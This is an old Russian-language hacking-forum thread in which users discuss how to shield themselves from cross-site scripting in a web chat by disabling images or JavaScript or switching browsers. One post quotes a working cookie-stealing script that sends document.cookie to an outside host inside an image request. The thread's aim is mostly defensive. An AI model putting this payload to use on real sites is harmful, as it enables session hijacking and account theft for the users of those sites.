HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.03.2005, 18:50
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
С нами: 11478626

Репутация: 112
По умолчанию

Да, прикольная страничка. Но подвесить она меня несмогла, ну кроме Ослика. Прочсто долго думал пока не завершил операцию.
 

  #2  
Старый 18.03.2005, 07:28
AGRESSOR
Новичок
Регистрация: 14.03.2005
Сообщений: 14
С нами: 11136358

Репутация: 0
По умолчанию

Цитата:
Сообщение от kyzmi4  
Да, прикольная страничка. Но подвесить она меня несмогла, ну кроме Ослика. Прочсто долго думал пока не завершил операцию.
О!!! Ответь, пожалуйста, как это ты смог устоять??? Другая операционка? Спецовый плагин к какой-нибудь опере, или модный файерволл, о котором я ещё не знаю????? А как насчёт всех остальных скриптов - выдерживаешь, нет???
 

  #3  
Старый 18.03.2005, 10:28
vai para o caralho
Новичок
Регистрация: 27.12.2004
Сообщений: 4
С нами: 11247386

Репутация: 0
По умолчанию

Цитата:
Сообщение от AGRESSOR  
О!!! Ответь, пожалуйста, как это ты смог устоять??? Другая операционка? Спецовый плагин к какой-нибудь опере, или модный файерволл, о котором я ещё не знаю????? А как насчёт всех остальных скриптов - выдерживаешь, нет???
Да,скинь адресок.Потестировать.
 

  #4  
Старый 17.03.2005, 20:30
DareDEVIL
Познающий
Регистрация: 23.12.2004
Сообщений: 48
С нами: 11252183

Репутация: 7
По умолчанию

а что вообще за чат такой?
 

  #5  
Старый 19.03.2005, 05:59
AGRESSOR
Новичок
Регистрация: 14.03.2005
Сообщений: 14
С нами: 11136358

Репутация: 0
По умолчанию

Адрес чата скинуть не могу - боюсь, припрётся толпа, и начнёт его ломать с ещё большим энтузиазмом. Типо, практика для детсада. А что до страничек - вот их адрес: dad-ie.narod.ru, но ведь проблема-то не в том, чтобы от СТРАНИЦ блокирнуться, а проблема в том, что через чат проходит практически любой скрипт\настройки - вплоть до изменения общего фона в чате, ну там, искажение фона и прочих игрушек. Так что увы. Как я уже понимаю, сейчас проблема стоит тока в броузере.
 

  #6  
Старый 20.03.2005, 15:31
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
С нами: 11627066

Репутация: 42
По умолчанию

Я бы посоветовал попробовать отключать показ картинок в браузере. Потому что большя часть Xss на этом и строится как раз. Вспомните пример взлома Чата мэйл.ру от скальпеля. Чтобы защититься от того конкретного примера, можно было просто отключить графику
 

  #7  
Старый 20.03.2005, 16:29
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами: 11893346

Репутация: 45


По умолчанию

Цитата:
Вспомните пример взлома Чата мэйл.ру от скальпеля. Чтобы защититься от того конкретного примера, можно было просто отключить графику
Это бы не спасло ...
Картинка там загружалась посредством яваскрпта, а не только через стандартный img src ...
Образно говоря, броузер "не знал" что загрузит ... Можно было бы впинуть скрипт через любой обработчик (онклик не рационален =) )

Последний раз редактировалось Че Гевара; 21.03.2005 в 16:00..
 

  #8  
Старый 21.03.2005, 15:39
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию

Если речь идет о примере
Код HTML:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
То в таком случае как раз браузер ЗНАЕТ что загружает картинку, поскольку загрузка производится через объект Image(). Т.е. отключение отображения картинок приводит к тому, что этот скрипт не работает.
 

  #9  
Старый 20.03.2005, 20:51
KEZ
Guest
Сообщений: n/a
С нами:

Репутация:
По умолчанию

Согласен.
Не только через картинку можно вставить сниффер
 

  #10  
Старый 21.03.2005, 02:16
AGRESSOR
Новичок
Регистрация: 14.03.2005
Сообщений: 14
С нами: 11136358

Репутация: 0
По умолчанию

Цитата:
Сообщение от KEZ  
Согласен.
Не только через картинку можно вставить сниффер
Да, коллега, полностью с вами согласен.. картинки - это далеко не выход, а этому летнему джазисту можно пожелать от души идти и играть джаз. Надеюсь, в музыке он больше шарит.
ИТАК, КОЛЛЕГИ. ЧТО Я ОБНАРУЖИЛ ЗА ПРОШЕДШИЕ ВЫХОДНЫЕ.
Мысль была настолько проста, что я успел обозвать сам себя кретином очень много раз... В общем. На чате орудуют ничем иным, как java-scriptom. У Netscape 476, как у очень древней версии, поддерживающей и пытающейся продвинуть свои собственные стандарты (не будем забывать, это то далёкое время, когда Netscape был королем, и пытался трепыхаться с каким-то своим стандартом) ОН ПРОСТО НЕ ИМЕЕТ ПОДДЕРЖКУ ДЖАВА СКРИПТОВ КАК ТАКОВЫХ - ВООБЩЕ.
А если в дополнительных свойствах ИЕ отключать джава-скрипты. то всё-равно ничего не получается. Однако... если взять Мозиллу.... файерфокс скажем... Или даже оперу (кстати, удивительно уёбищный броузер, такая дутая реклама, и такой обрез на возможностях) то.. Проблема решается!!!! Ураа!!! Седлай коня, дорогая, решение я нашёл, скоро вернусь домой с войны. Ан нет. С ПОДДЕРЖКОЙ РУССКИХ ШРИФТОВ И КОДИРОВОК У ОПЕРЫ И ФАЙЕРФОКСА - ПОЛНАЯ ЖОПА. Ну, вообще то есть. Есть спецовые проги для оперы. для файерфокса. Но всё-равно остаются пару косых, которые лично я вообще не могу подправить!!!!! Увы.. это уже обсуждение для другой темы форума..... Спасибо всем тем, кто ответил. вы подарили мне массу размышлений... если кто-то знает ещё какие-нибудь способы защиты. пожалуйста. пишите сюда. Очень буду признателен.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.